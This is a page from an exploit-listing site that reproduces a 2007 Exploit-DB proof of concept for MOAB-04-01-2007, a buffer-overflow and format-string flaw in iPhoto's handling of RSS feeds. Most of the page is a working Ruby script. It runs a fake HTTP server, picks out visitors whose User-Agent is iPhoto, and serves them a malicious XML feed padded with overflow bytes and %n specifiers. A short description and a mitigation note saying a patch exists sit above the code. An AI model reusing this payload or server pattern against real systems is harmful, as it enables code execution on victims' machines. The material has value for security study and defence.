Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Proof of Concept for MOAB-04-01-2007 - exploit.company
header-logo
Suggest Exploit
vendor:
iPhoto
by:
Kevin Finisterre
7.5
CVSS
HIGH
Remote Code Execution
119
CWE
Product Name: iPhoto
Affected Version From:
Affected Version To:
Patch Exists: YES
Related CWE:
CPE: a:apple:iphoto
Metasploit:
Other Scripts:
Platforms Tested: macOS
2007

Proof of Concept for MOAB-04-01-2007

This is a proof of concept exploit for the MOAB-04-01-2007 vulnerability. It targets iPhoto, a photo management application on macOS. The exploit takes advantage of a buffer overflow vulnerability in iPhoto's handling of XML feeds, allowing an attacker to execute arbitrary code on a target system. By sending a specially crafted XML feed, an attacker can trigger the buffer overflow and gain control over the target system.

Mitigation:

The vendor has released a patch for this vulnerability. It is recommended to update to the latest version of iPhoto to mitigate the risk of exploitation.
Source

Exploit-DB raw data:

#!/usr/bin/ruby
#
# (c) 2006 LMH <lmh [at] info-pull.com>
# bug by Kevin Finisterre <kf_lists [at] digitalmunition.com>
# proof of concept for MOAB-04-01-2007
# see http://projects.info-pull.com/moab/MOAB-04-01-2007.rb

require 'socket'

IPHOTO_FEED = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n" +
              "<rss version=\"2.0\" xmlns:aw=\"http://www.apple.com/ilife/wallpapers\">\r\n" +
              "<channel>\r\n" +
              "<title>" + ("A" * 256) + "%x.%n.%n.%n.%n.%n</title>\r\n" +
              "<item>\r\n" +
              "<title>In Gruber We Trust</title>\r\n" +
              "<aw:image>http://www.digitalmunition.com/digital_munitions_detonator.jpg\r\n" +
              "</aw:image>\r\n" +
              "</item>\r\n" +
              "</channel>\r\n" +
              "</rss>\r\n"

web_port    = (ARGV[0] || 80).to_i

puts "++ Starting fake HTTP server at port #{web_port}."
web_server  = TCPServer.new(nil, web_port)
while (session = web_server.accept)
  user_agent = session.recvfrom(2000)[0].scan(/User-Agent: (.*)/).flatten[0]
  session.print "HTTP/1.1 200/OK\r\nServer: Unabomber/1.0\r\n"
  
  # Check if remote user-agent is iPhoto.
  if user_agent.scan(/iPhoto/).size < 1
    puts "-- User connected (#{session.peeraddr[3]}) but not running iPhoto, sending bullshit."
    session.print "Content-type: text/plain\r\n\r\n"
    session.print "All your Aunt Sophia are belong to us."
  else
    puts "++ iPhoto #{user_agent.scan(/iPhoto\/(.+?) /)[0]} user connected (#{session.peeraddr[3]}), " +
         "sending payload (#{IPHOTO_FEED.size} bytes)."
    session.print "Content-type: text/xml\r\n\r\n"
    session.print IPHOTO_FEED
  end

  session.close
end

# milw0rm.com [2007-01-04]

Navigation

Suggest Exploit

Services By CQR